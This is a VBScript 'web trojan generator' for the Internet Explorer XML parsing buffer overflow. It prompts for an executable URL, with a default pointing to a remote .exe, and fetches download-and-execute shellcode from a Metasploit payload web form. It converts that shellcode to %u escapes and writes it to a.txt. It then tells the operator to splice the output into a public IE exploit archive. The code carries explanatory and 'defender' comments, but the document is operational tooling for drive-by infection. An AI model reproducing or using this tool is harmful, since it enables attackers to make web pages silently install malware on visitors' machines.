
    网马生成器 MS Internet Explorer XML Parsing Buffer Overflow

    作者:admin 时间:2021-02-18 15:39

    'code by lcx

    ' Stage 1: obtain the generated payload as text.
    ' Script-level errors are suppressed from here on, so a failed request or an
    ' unexpected response is never reported; later steps run on whatever is in Body/code.
    On Error Resume Next
    ' Prompt the operator for the URL of the executable (the default is the author's sample value).
    Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
    ' Build a request to a remote payload-generation web form (MODULE=win32_downloadexec),
    ' passing the operator-supplied URL as OPT_URL. The request is plain HTTP, so the full
    ' query string, including the executable URL, is visible in proxy and network logs.
    url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"


    ' Fetch the generated page and isolate the span from "$shellcode =" up to "</div></pre>".
    Body = getHTTPPage(url)
    Set Re = New RegExp
    Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"

    Set Matches = Re.Execute(Body)
    ' When nothing matches, Body is left as the complete, unfiltered response.
    If Matches.Count>0 Then Body = Matches(0).value

    ' Strip, in order: the "$shellcode =" prefix, double quotes, CR, ";", the closing
    ' "</div></pre>", LF and "." characters. Presumably this leaves one unbroken run of
    ' \xNN escapes; nothing here checks that it does.
    code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

    ' Rewrites every pair of "\xAA\xBB" escapes in str as "%uBBAA" (the two bytes swapped)
    ' and returns the result.
    ' The pattern uses ".." rather than hex classes, so any two characters after "\x" are
    ' accepted; an unpaired trailing "\xNN" is left unchanged.
    ' Defender note: long runs of %uXXXX tokens in HTML or script content are the form
    ' consumed by JavaScript unescape() and are a common content-inspection signature
    ' for embedded binary payloads.
    function replaceregex(str)
    set regex=new regExp
    regex.pattern="\\x(..)\\x(..)"
    regex.IgnoreCase=true
    ' global=true replaces every pair, not only the first one.
    regex.global=true
    ' NOTE(review): "matches" is not declared locally and VBScript names are
    ' case-insensitive, so this appears to reuse the script-level Matches variable.
    matches=regex.replace(str,"%u$2$1")
    replaceregex=matches
    end Function


    ' Downloads Path with GetBody and returns the response decoded as GB2312 text.
    ' The charset is hard-coded; no Content-Type header from the response is consulted.
    Function getHTTPPage(Path)
    t = GetBody(Path)
    getHTTPPage = BytesToBstr(t, "GB2312")
    End Function

    ' Performs a synchronous HTTP GET of url and returns the raw response bytes.
    ' Errors are suppressed, so on any failure the function returns without assigning a
    ' value and the caller receives Empty. The HTTP status code is never inspected.
    ' Defender note: a script host instantiating Microsoft.XMLHTTP together with
    ' ADODB.Stream (see BytesToBstr) is a pairing frequently covered by endpoint
    ' detection rules.
    Function GetBody(url)
    On Error Resume Next
    Set Retrieval = CreateObject("Microsoft.XMLHTTP")
    With Retrieval
    ' Third argument False = synchronous; user name and password are empty strings.
    .Open "Get", url, False, "", ""
    .Send
    GetBody = .ResponseBody
    End With
    Set Retrieval = Nothing
    End Function

    ' Converts a byte array (Body) to a string using the character set named in Cset,
    ' by round-tripping the bytes through an ADODB.Stream object.
    Function BytesToBstr(Body, Cset)
    Dim objstream
    Set objstream = CreateObject("adodb.stream")
    ' Type 1 = binary stream, Mode 3 = read/write.
    objstream.Type = 1
    objstream.Mode = 3
    objstream.Open
    objstream.Write Body
    ' Rewind, then switch the stream to text mode (Type 2) so ReadText decodes with Cset.
    objstream.Position = 0
    objstream.Type = 2
    objstream.Charset = Cset
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
    End Function

    ' Returns vstrIn with characters whose Asc() magnitude is &HFF or greater rewritten as
    ' two "%"-prefixed hex values; every other character is copied through unchanged.
    ' URL-reserved ASCII characters such as "&", "=" and spaces are therefore not escaped.
    ' Presumably intended for double-byte (ANSI code page) characters, for which Asc()
    ' can return a negative value - confirm against the target locale.
    Function URLEncoding(vstrIn)
    strReturn = ""
    For aaaa = 1 To Len(vstrIn)
    ThisChr = Mid(vStrIn,aaaa,1)
    If Abs(Asc(ThisChr)) < &HFF Then
    strReturn = strReturn & ThisChr
    Else
    innerCode = Asc(ThisChr)
    ' Map a negative Asc() result into the unsigned 16-bit range.
    If innerCode < 0 Then
    innerCode = innerCode + &H10000
    End If
    ' NOTE(review): the high part is obtained by integer division by &HFF (255), not by
    ' an 8-bit shift - confirm this is the intended encoding.
    Hight8 = (innerCode And &HFF00)\ &HFF
    Low8 = innerCode And &HFF
    ' Hex() does not zero-pad, so values below &H10 produce a single hex digit.
    strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
    End If
    Next
    URLEncoding = strReturn
    End Function

    ' Stage 2: convert the extracted text to %u form and persist it.
    ' Observable artifacts of a run: one outbound HTTP request from the script host and a
    ' file named a.txt written to the current working directory.
    set fso=CreateObject("scripting.filesystemobject")
    ' Mode 2 = ForWriting, True = create if missing; an existing a.txt is overwritten.
    set fileS=fso.opentextfile("a.txt",2,true)
    fileS.writeline replaceregex(code)
    'fileS.writeline body
    ' The same converted text is also echoed to the console or a message box.
    wscript.echo replaceregex(code)
    files.close
    set fso=Nothing

    ' Final operator message (in Chinese): reports that a.txt was generated and says its
    ' contents are meant to replace the "shellcode1" value in the archive named in the string.
    ' Because errors are suppressed, this message is shown even when the download or
    ' extraction produced nothing usable.
    wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"